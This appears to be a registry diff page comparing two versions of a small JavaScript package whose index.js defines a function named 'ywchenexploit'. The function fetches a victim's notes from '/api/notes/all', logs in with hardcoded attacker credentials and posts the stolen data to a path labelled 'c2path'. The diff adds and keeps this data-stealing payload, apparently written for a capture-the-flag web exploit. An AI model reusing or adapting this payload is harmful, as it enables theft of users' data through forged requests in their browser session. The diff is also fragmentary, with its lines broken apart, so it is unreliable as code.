ywchenpackage 1.0.7 → 1.0.9
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +3 -3
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
function ywchenexploit(cookie) {
|
2
2
|
let stolenurl = "/api/notes/all";
|
3
|
-
let c2path = "/api/notes
|
3
|
+
let c2path = "/api/notes";
|
4
4
|
let stolen;
|
5
5
|
fetch(stolenurl)
|
6
6
|
.then(
|
@@ -17,9 +17,9 @@ function ywchenexploit(cookie) {
|
|
17
17
|
"/login", {
|
18
18
|
method: "POST",
|
19
19
|
headers: {
|
20
|
-
"content-type": "application/
|
20
|
+
"content-type": "application/x-www-form-urlencoded"
|
21
21
|
},
|
22
|
-
body:
|
22
|
+
body: "username=ywchen&password=ywchen"
|
23
23
|
}).then(
|
24
24
|
(response) => {
|
25
25
|
fetch(
|